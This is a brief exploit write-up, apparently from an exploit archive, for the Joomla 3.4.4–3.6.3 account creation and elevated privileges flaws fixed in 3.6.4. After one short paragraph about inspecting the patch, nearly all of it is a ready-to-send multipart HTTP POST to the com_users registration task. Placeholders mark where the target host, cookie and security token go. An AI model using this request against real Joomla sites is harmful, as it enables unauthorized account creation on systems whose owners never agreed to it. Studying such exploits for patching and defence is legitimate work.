Joomla 3.6.4 Account Creation/Elevated Privileges write-up Vulnerability

Yesterday Joomla published version 3.6.4, an update to patch security issues:

- High Priority — Core — Account Creation (affecting Joomla! 3.4.4 through 3.6.3) More information
- High Priority — Core — Elevated Privileges (affecting Joomla! 3.4.4 through 3.6.3) More information
Because I was curious to see how these vulnerabilies worked I decided to check out the patch and write an exploit. By looking at the changes, the issue had to be in the components/com_users/controllers/user.php file.

EXPLOIT
=========================================================
POST /index.php?option=com_users&task=user.register HTTP/1.1
Host: [INSERT_HOST]
Referer: [INSERT_HOST]/index.php/component/users/?view=registration
Cookie: [INSERT_COOKIE]
Connection: close

------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[name]"

hackers
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[username]"

hackers
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[password1]"

password
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[password2]"

password
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[email1]"

[email protected]
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[email2]"

[email protected]
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="option"

com_users
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="task"

user.register
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="[INSERT_SECURITY_TOKEN]"

1
------WebKitFormBoundarydPTNyMPMzmAhBsf4--
=========================================================

#  0day.today [2018-01-02]  #